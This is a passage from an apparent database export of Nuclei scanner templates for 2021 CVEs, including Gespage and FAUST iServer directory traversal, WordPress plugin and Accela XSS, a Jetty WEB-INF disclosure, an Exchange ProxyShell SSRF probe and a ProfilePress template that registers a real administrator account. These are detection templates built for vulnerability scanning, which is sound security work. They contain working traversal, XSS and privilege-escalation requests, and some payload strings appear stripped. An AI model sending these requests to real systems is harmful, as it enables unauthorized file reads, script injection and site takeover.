https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33807\n - https://www.gespage.com/cartadis-db/\n - https://www.cartadis.com/gespage-website/\n - https://support.gespage.com/fr/support/solutions/articles/14000130201-security-advisory-gespage-directory-traversal\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-33807\n cwe-id: CWE-22\n epss-score: 0.02187\n epss-percentile: 0.89167\n cpe: cpe:2.3:a:gespage:gespage:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: gespage\n product: gespage\n tags: cve2021,cve,lfi,gespage\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"NetpDoDomainJoin:\"\n\n - type: word\n part: header\n words:\n - \"application/octet-stream\"\n\n - 
type: status\n status:\n - 200\n# digest: 4a0a0047304502210081ba553c292e57848a13e7ec65c8dec5a15b83b70c930746bfab4dbcd266287702203de6c624da037776f85ee134ccaaec236dd1bef707915e944cfe6731006bb29b:922c64590222798bb761d5b6d8e72950", "hash": "0e18e02f192da3cffe2f24aef6b8255d", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30836b" }, "name": "CVE-2021-33851.yaml", "content": "id: CVE-2021-33851\n\ninfo:\n name: WordPress Customize Login Image <3.5.3 - Cross-Site Scripting\n author: 8authur\n severity: medium\n description: |\n WordPress Customize Login Image plugin prior to 3.5.3 contains a cross-site scripting vulnerability via the custom logo link on the Settings page. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could lead to cross-site scripting (XSS) attacks, allowing an attacker to execute malicious scripts in the context of the victim's browser.\n remediation: |\n Update to the latest version of the WordPress Customize Login Image plugin (3.5.3) to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/c67753fb-9111-453e-951f-854c6ce31203\n - https://cybersecurityworks.com/zerodays/cve-2021-33851-stored-cross-site-scripting-in-wordpress-customize-login-image.html\n - https://wordpress.org/plugins/customize-login-image/\n - https://nvd.nist.gov/vuln/detail/cve-2021-33851\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2021-33851\n cwe-id: CWE-79\n epss-score: 0.00069\n epss-percentile: 0.2831\n cpe: cpe:2.3:a:apasionados:customize_login_image:3.4:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 4\n vendor: apasionados\n product: customize_login_image\n framework: wordpress\n tags: 
cve,cve2021,wpscan,wordpress,customize-login-image,wp,authenticated,wp-plugin,xss,apasionados\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/options-general.php?page=customize-login-image/customize-login-image-options.php HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /wp-admin/options.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n option_page=customize-login-image-settings-group&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dcustomize-login-image%252Fcustomize-login-image-options.php%26settings-updated%3Dtrue&cli_logo_url=&cli_logo_file=&cli_login_background_color=&cli_custom_css=\n - |\n GET /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_4 == 200'\n - 'contains(header_4, \"text/html\")'\n - 'contains(body_4, \"Go to \")'\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - 'name=\"_wpnonce\" value=\"([0-9a-zA-Z]+)\"'\n internal: true\n part: body\n# digest: 490a004630440220098b618e64216cc6e575a474182053eae704f5b3d91f98e7851d52a79480d57002207755a534f0e8813a54b102ebe3fb5b8a4f145c17ff32468ab7f25305f3536832:922c64590222798bb761d5b6d8e72950", "hash": "e9e68b2e907b49ef1af7aa3d464e5cc4", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30836c" }, "name": "CVE-2021-33904.yaml", "content": "id: CVE-2021-33904\n\ninfo:\n name: Accela Civic Platform <=21.1 - Cross-Site Scripting\n author: geeknik\n severity: medium\n description: Accela Civic Platform through 21.1 contains a cross-site scripting vulnerability via the security/hostSignon.do parameter servProvCode.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's 
browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a patched version of Accela Civic Platform (version >21.1) that includes proper input validation to mitigate the XSS vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/49980\n - https://gist.github.com/0xx7/3d934939d7122fe23db11bc48eda9d21\n - http://packetstormsecurity.com/files/163093/Accela-Civic-Platorm-21.1-Cross-Site-Scripting.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-33904\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-33904\n cwe-id: CWE-79\n epss-score: 0.00182\n epss-percentile: 0.54617\n cpe: cpe:2.3:a:accela:civic_platform:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: accela\n product: civic_platform\n tags: cve,cve2021,accela,xss,edb,packetstorm\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(document.domain)%5e%22a2pbrnzx5a9\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: word\n words:\n - '\"k3woq\"^confirm(document.domain)^\"a2pbrnzx5a9\"'\n - 'servProvCode'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100a95bda837d8b3972b0cfccf95320c0e041709f4cff91ea1ce8e061322f58c92e022100c14bcebdc61fb62d8cd5a7392dd3d5350a3aff7a740c0b1b270eebe6d48999ec:922c64590222798bb761d5b6d8e72950", "hash": "ed8dab66c4d946dc83f84925543e97d3", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30836d" }, "name": "CVE-2021-34370.yaml", "content": "id: CVE-2021-34370\n\ninfo:\n name: Accela Civic Platform <=21.1 - Cross-Site Scripting\n author: 0x_Akoko\n severity: medium\n description: Accela Civic Platform through 21.1 contains a cross-site scripting vulnerability via ssoAdapter/logoutAction.do successURL.\n impact: |\n 
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. Note that the template below does not verify script execution: it only checks that the successURL value is reflected into an unvalidated Location redirect (to interact.sh), i.e. the open-redirect behaviour of the same successURL parameter; confirm actual script execution manually before reporting XSS.\n remediation: |\n Upgrade to a patched version of Accela Civic Platform (version >21.1) that includes proper input validation and sanitization.\n reference:\n - https://www.exploit-db.com/exploits/49990\n - https://www.accela.com/civic-platform/\n - https://gist.github.com/0xx7/7e9f1b725f7ff98b9239d3cb027b7dc8\n - https://nvd.nist.gov/vuln/detail/CVE-2021-34370\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-34370\n cwe-id: CWE-79\n epss-score: 0.00183\n epss-percentile: 0.55682\n cpe: cpe:2.3:a:accela:civic_platform:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: accela\n product: civic_platform\n tags: cve,cve2021,xss,redirect,accela,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://interact.sh/\"\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$'\n# digest: 4a0a00473045022100e1d5e0fe66e7bd88bc45de6a476cbc23b17220cde20c7b7560d133853427f82d0220014968e50c61f56d305daa49a33662330b1a2705fc3d7dd7992593fd4630945b:922c64590222798bb761d5b6d8e72950", "hash": "2256eebb87a5cfb6ee97ac0e7c7696da", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30836e" }, "name": "CVE-2021-34429.yaml", "content": "id: CVE-2021-34429\n\ninfo:\n name: Eclipse Jetty - Information Disclosure\n author: bernardofsr,am0nt31r0\n severity: medium\n description: |\n Eclipse Jetty 9.4.37-9.4.42, 10.0.1-10.0.5 and 11.0.1-11.0.5 are susceptible to improper authorization. 
URIs can be crafted using some encoded characters to access the content of the WEB-INF directory and/or bypass some security constraints. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations. This is a variation of the vulnerability reported in CVE-2021-28164/GHSA-v7ff-8wcx-gmc5.\n impact: |\n An attacker can exploit this vulnerability to access sensitive information, such as configuration files or credentials, leading to potential unauthorized access or further attacks.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the information disclosure vulnerability in Eclipse Jetty.\n reference:\n - https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm\n - https://lists.apache.org/thread.html/r763840320a80e515331cbc1e613fa93f25faf62e991974171a325c82@%3Cdev.zookeeper.apache.org%3E\n - https://lists.apache.org/thread.html/r7dd079fa0ac6f47ba1ad0af98d7d0276547b8a4e005f034fb1016951@%3Cissues.zookeeper.apache.org%3E\n - https://nvd.nist.gov/vuln/detail/CVE-2021-34429\n - https://lists.apache.org/thread.html/r029c0c6833c8bb6acb094733fd7b75029d633f47a92f1c9d14391fc0@%3Cnotifications.zookeeper.apache.org%3E\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2021-34429\n cwe-id: CWE-200,NVD-CWE-Other\n epss-score: 0.45704\n epss-percentile: 0.97324\n cpe: cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: eclipse\n product: jetty\n tags: cve2021,cve,jetty,eclipse\n\nhttp:\n - raw:\n - |+\n GET /%u002e/WEB-INF/web.xml HTTP/1.1\n Host: {{Hostname}}\n Origin: {{BaseURL}}\n\n - |+\n GET /.%00/WEB-INF/web.xml HTTP/1.1\n Host: {{Hostname}}\n Origin: {{BaseURL}}\n\n unsafe: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n - \"java.sun.com\"\n condition: and\n\n - type: word\n part: header\n words:\n - 
\"application/xml\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100bd58c1d099476379c284c800fdff4ff7fb04548ad586e31004eb4f4572dad96b02205e568d1598ba3e2de032422dcb82f910c03c98ec68ccee39ac684be4f30c6fd5:922c64590222798bb761d5b6d8e72950", "hash": "5df30ee071f5b0bc015a673892e74f78", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30836f" }, "name": "CVE-2021-34473.yaml", "content": "id: CVE-2021-34473\n\ninfo:\n name: Exchange Server - Remote Code Execution\n author: arcc,intx0x80,dwisiswant0,r3dg33k\n severity: critical\n description: |\n Microsoft Exchange Server is vulnerable to a remote code execution vulnerability (the ProxyShell chain). This template only probes the Autodiscover-based SSRF / path-confusion entry point of that chain and does not execute code. This CVE ID is unique from CVE-2021-31196, CVE-2021-31206.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected Exchange Server, potentially leading to a complete compromise of the system.\n remediation: Apply the Microsoft security update for the installed Exchange Server release as described in the MSRC advisory linked below; for Exchange Server 2019 that is Cumulative Update 9 or later, but the CPE above also lists Exchange Server 2013 CU23, so older releases need their own security update or an upgrade to the latest supported version.\n reference:\n - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473\n - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html\n - https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1\n - https://nvd.nist.gov/vuln/detail/CVE-2021-34473\n - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34473\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\n cvss-score: 9.1\n cve-id: CVE-2021-34473\n cwe-id: CWE-918\n epss-score: 0.97285\n epss-percentile: 0.99848\n cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: microsoft\n product: exchange_server\n tags: cve2021,cve,ssrf,rce,exchange,kev,microsoft\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com'\n 
- '{{BaseURL}}/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com'\n\n matchers:\n - type: word\n part: body\n words:\n - \"Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException\"\n - \"Exchange MAPI/HTTP Connectivity Endpoint\"\n condition: or\n# digest: 4a0a0047304502201b1af120ec090b8ce24a896b622e97f0cac87382b79a5e59e1e9d581099e6d7a022100c51af8c078f10d5837821287b2fcc3f013e3cd4f684ce1b3c9009a552bb36138:922c64590222798bb761d5b6d8e72950", "hash": "f06136a1112dff06a797e20baf7a6faf", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308370" }, "name": "CVE-2021-34621.yaml", "content": "id: CVE-2021-34621\n\ninfo:\n name: WordPress ProfilePress 3.0.0-3.1.3 - Admin User Creation Weakness\n author: 0xsapra\n severity: critical\n description: ProfilePress WordPress plugin is susceptible to a vulnerability in the user registration component in the ~/src/Classes/RegistrationAuth.php file that makes it possible for users to register on sites as an administrator.\n impact: |\n An attacker can exploit this vulnerability to create unauthorized admin accounts and gain full control over the WordPress site. This template is intrusive: it registers a real administrator account on the target (random username, @interact.sh e-mail address, wp_capabilities[administrator]=1) and then logs in as it, so delete that account after testing.\n remediation: |\n Update ProfilePress to a release newer than 3.1.3 (versions 3.0.0 through 3.1.3 are affected) to fix the admin user creation weakness.\n reference:\n - https://www.wordfence.com/blog/2021/06/easily-exploitable-critical-vulnerabilities-patched-in-profilepress-plugin\n - https://nvd.nist.gov/vuln/detail/CVE-2021-34621\n - https://www.wordfence.com/blog/2021/06/easily-exploitable-critical-vulnerabilities-patched-in-profilepress-plugin/\n - http://packetstormsecurity.com/files/163973/WordPress-ProfilePress-3.1.3-Privilege-Escalation.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-34621\n cwe-id: CWE-306,CWE-269\n epss-score: 0.7888\n epss-percentile: 0.97984\n cpe: cpe:2.3:a:properfraction:profilepress:*:*:*:*:*:wordpress:*:*\n metadata:\n 
max-request: 3\n vendor: properfraction\n product: profilepress\n framework: wordpress\n tags: cve2021,cve,wordpress,wp-plugin,packetstorm,intrusive,properfraction\n\nhttp:\n - raw:\n - |\n POST /wp-admin/admin-ajax.php HTTP/1.1\n Host: {{Hostname}}\n Accept: application/json, text/javascript, */*; q=0.01\n Content-Type: multipart/form-data; boundary=---------------------------138742543134772812001999326589\n Origin: {{BaseURL}}\n Referer: {{BaseURL}}\n\n -----------------------------138742543134772812001999326589\n Content-Disposition: form-data; name=\"reg_username\"\n\n {{randstr}}\n -----------------------------138742543134772812001999326589\n Content-Disposition: form-data; name=\"reg_email\"\n\n {{randstr}}@interact.sh\n -----------------------------138742543134772812001999326589\n Content-Disposition: form-data; name=\"reg_password\"\n\n {{randstr}}@interact.sh\n -----------------------------138742543134772812001999326589\n Content-Disposition: form-data; name=\"reg_password_present\"\n\n true\n -----------------------------138742543134772812001999326589\n Content-Disposition: form-data; name=\"reg_first_name\"\n\n {{randstr}}@interact.sh\n -----------------------------138742543134772812001999326589\n Content-Disposition: form-data; name=\"reg_last_name\"\n\n {{randstr}}@interact.sh\n -----------------------------138742543134772812001999326589\n Content-Disposition: form-data; name=\"_wp_http_referer\"\n\n /wp/?page_id=18\n -----------------------------138742543134772812001999326589\n Content-Disposition: form-data; name=\"pp_current_url\"\n\n {{BaseURL}}\n -----------------------------138742543134772812001999326589\n Content-Disposition: form-data; name=\"wp_capabilities[administrator]\"\n\n 1\n -----------------------------138742543134772812001999326589\n Content-Disposition: form-data; name=\"signup_form_id\"\n\n 1\n -----------------------------138742543134772812001999326589\n Content-Disposition: form-data; name=\"signup_referrer_page\"\n\n\n 
-----------------------------138742543134772812001999326589\n Content-Disposition: form-data; name=\"action\"\n\n pp_ajax_signup\n -----------------------------138742543134772812001999326589\n Content-Disposition: form-data; name=\"melange_id\"\n\n\n -----------------------------138742543134772812001999326589--\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Accept: application/json, text/javascript, */*; q=0.01\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n Origin: {{BaseURL}}\n Referer: {{BaseURL}}\n\n log={{randstr}}@interact.sh&pwd={{randstr}}@interact.sh&wp-submit=Log+In\n - |\n GET /wp-admin/ HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n Connection: close\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - Welcome to your WordPress Dashboard\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100ada3493f206abd735b16deb87788c4c837ad79b21b18a91eb6c5271f9b2e87620220553d246455cb93e3e3c8c33a06b8ba3a6fdb714db165681c77ed54d827d2aa7f:922c64590222798bb761d5b6d8e72950", "hash": "ab6b2ccfc1eb5f356949906558cf531f", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308371" }, "name": "CVE-2021-34640.yaml", "content": "id: CVE-2021-34640\n\ninfo:\n name: WordPress Securimage-WP-Fixed <=3.5.4 - Cross-Site Scripting\n author: dhiyaneshDK\n severity: medium\n description: WordPress Securimage-WP-Fixed plugin 3.5.4 and prior contains a cross-site scripting vulnerability due to the use of $_SERVER['PHP_SELF'] in the ~/securimage-wp.php file, which allows attackers to inject arbitrary web scripts.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update the Securimage-WP-Fixed plugin to a release newer than 3.5.4; version 3.5.4 and all prior releases are affected, so updating to 3.5.4 itself does not mitigate the vulnerability.\n reference:\n - 
https://wpscan.com/vulnerability/22017067-8675-4884-b976-d7f5a71279d2\n - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-34640\n - https://plugins.trac.wordpress.org/browser/securimage-wp-fixed/trunk/securimage-wp.php#L628\n - https://nvd.nist.gov/vuln/detail/CVE-2021-34640\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-34640\n cwe-id: CWE-79\n epss-score: 0.00116\n epss-percentile: 0.45185\n cpe: cpe:2.3:a:securimage-wp-fixed_project:securimage-wp-fixed:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: securimage-wp-fixed_project\n product: securimage-wp-fixed\n framework: wordpress\n tags: cve2021,cve,wpscan,wordpress,wp-plugin,authenticated,securimage-wp-fixed_project\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: wordpress_test_cookie=WP%20Cookie%20check\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n GET //wp-admin/options-general.php/\">/script%3E?page=securimage-wp-options%2F HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100f71f4027e35181f2336f1a5f0c7fa04fd40c25ca4ea1749124253649571d1d09022100a95ccf3acc3d6ad779d55f0e9ae4ce0735927cbfd3a5aa7f9b2350c68169ee4d:922c64590222798bb761d5b6d8e72950", "hash": "8d13bff3277660d4fea0360291ae2486", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308372" }, "name": "CVE-2021-34643.yaml", "content": "id: CVE-2021-34643\n\ninfo:\n name: WordPress Skaut Bazar <1.3.3 - Cross-Site Scripting\n author: dhiyaneshDK\n severity: medium\n description: WordPress Skaut Bazar plugin before 1.3.3 contains a reflected cross-site scripting vulnerability due to the use of 
$_SERVER['PHP_SELF'] in the ~/skaut-bazar.php file, which allows attackers to inject arbitrary web scripts.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions.\n remediation: |\n Update to the latest version of WordPress Skaut Bazar plugin (1.3.3) or apply the vendor-provided patch to fix the XSS vulnerability.\n reference:\n - https://wpscan.com/vulnerability/c1b41276-b8fb-4a5c-bede-84ea62663b7a\n - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-34643\n - https://plugins.trac.wordpress.org/browser/skaut-bazar/tags/1.3.2/skaut-bazar.php#L657\n - https://nvd.nist.gov/vuln/detail/CVE-2021-34643\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-34643\n cwe-id: CWE-79\n epss-score: 0.00116\n epss-percentile: 0.44405\n cpe: cpe:2.3:a:skaut-bazar_project:skaut-bazar:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: skaut-bazar_project\n product: skaut-bazar\n framework: wordpress\n tags: cve2021,cve,wpscan,wordpress,wp-plugin,authenticated,skaut-bazar_project,xss\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: wordpress_test_cookie=WP%20Cookie%20check\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n GET /wp-admin/options-general.php//?page=skatubazar_option HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 
490a0046304402206d3a11c0c355a2d754828a3bf9cb67c195bd89e335c164e6c70ff16f69226d9202202f501c665407d0e31660af7d953a8a91410f52a5b28a21f28bf895b7b18f7977:922c64590222798bb761d5b6d8e72950", "hash": "ce1c752ce2f99153251543f7b20a7141", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308373" }, "name": "CVE-2021-34805.yaml", "content": "id: CVE-2021-34805\n\ninfo:\n name: FAUST iServer 9.0.018.018.4 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: FAUST iServer before 9.0.019.019.7 is susceptible to local file inclusion because for each URL request it accesses the corresponding .fau file on the operating system without preventing %2e%2e%5c directory traversal.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server.\n remediation: |\n Apply the latest security patch or update to a non-vulnerable version of FAUST iServer.\n reference:\n - https://cxsecurity.com/issue/WLB-2022010120\n - http://packetstormsecurity.com/files/165701/FAUST-iServer-9.0.018.018.4-Local-File-Inclusion.html\n - http://www.land-software.de/lfs.fau?prj=iweb&dn=faust+iserver\n - https://nvd.nist.gov/vuln/detail/CVE-2021-34805\n - https://github.com/20142995/Goby\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-34805\n cwe-id: CWE-22\n epss-score: 0.17035\n epss-percentile: 0.95944\n cpe: cpe:2.3:a:land-software:faust_iserver:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: land-software\n product: faust_iserver\n tags: cve2021,cve,lfi,packetstorm,faust,iserver,land-software\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"bit app support\"\n - \"fonts\"\n - \"extensions\"\n condition: and\n\n - 
type: status\n status:\n - 200\n# digest: 4a0a004730450220483d18d13b339bce1072f55780e09412873fbc11be357967dfd8c3168bda3bc80221009cd68fbbedfa7f4c6bfe9543021f624b8a94c3ed938791eb9f7c7ffb2daebb88:922c64590222798bb761d5b6d8e72950", "hash": "b3400256e25a32f1341d3a199f03e0c5", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308374" }, "name": "CVE-2021-35250.yaml", "content": "id: CVE-2021-35250\n\ninfo:\n name: SolarWinds Serv-U 15.3 - Directory Traversal\n author: johnk3r,pdteam\n severity: high\n description: |\n SolarWinds Serv-U 15.3 is susceptible to local file inclusion, which may allow an attacker access to installation and server files and also make it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further attacks.\n remediation: Resolved in Serv-U 15.3 Hotfix 1.\n reference:\n - https://github.com/rissor41/SolarWinds-CVE-2021-35250\n - https://support.solarwinds.com/SuccessCenter/s/article/Serv-U-15-3-HotFix-1?language=en_US\n - https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35250\n - https://twitter.com/shaybt12/status/1646966578695622662?s=43&t=5HOgSFut7Y75N7CBHEikSg\n - https://nvd.nist.gov/vuln/detail/CVE-2021-35250\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-35250\n cwe-id: CWE-22\n epss-score: 0.05835\n epss-percentile: 0.93245\n cpe: cpe:2.3:a:solarwinds:serv-u:15.3:-:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: solarwinds\n product: serv-u\n shodan-query: product:\"Rhinosoft Serv-U httpd\"\n tags: cve2021,cve,solarwinds,traversal\n\nhttp:\n - raw:\n - |\n POST 
/?Command=NOOP&InternalFile=../../../../../../../../../../../../../../Windows/win.ini&NewWebClient=1 HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n /?Command=NOOP\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"\\\\[(font|extension|file)s\\\\]\"\n\n - type: status\n status:\n - 401\n# digest: 490a0046304402200620000d186c36d678271b33d3f8ab02fa3ece06cd95c0344ba841a95c9659f802201309537d97e91561f1fd81ac4850c36eca8c4bf67806545f58635619957ea31a:922c64590222798bb761d5b6d8e72950", "hash": "868fa8c4e63e5a99e360bd360e43bd5d", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308375" }, "name": "CVE-2021-35265.yaml", "content": "id: CVE-2021-35265\n\ninfo:\n name: MaxSite CMS <V106 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: |\n A reflected cross-site scripting vulnerability in MaxSite CMS before V106 via product/page/* allows remote attackers to inject arbitrary web script into a page.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to MaxSite CMS V106 or later (releases before V106 are affected), or apply the vendor-provided fix from the linked commit, to mitigate the XSS vulnerability (CVE-2021-35265).\n reference:\n - https://github.com/maxsite/cms/issues/414#issue-726249183\n - https://nvd.nist.gov/vuln/detail/CVE-2021-35265\n - https://github.com/maxsite/cms/commit/6b0ab1de9f3d471485d1347e800a9ce43fedbf1a\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-35265\n cwe-id: CWE-79\n epss-score: 0.00133\n epss-percentile: 0.47461\n cpe: cpe:2.3:a:maxsite:maxsite_cms:*:*:*:*:*:*:*:*\n metadata:\n max-request: 
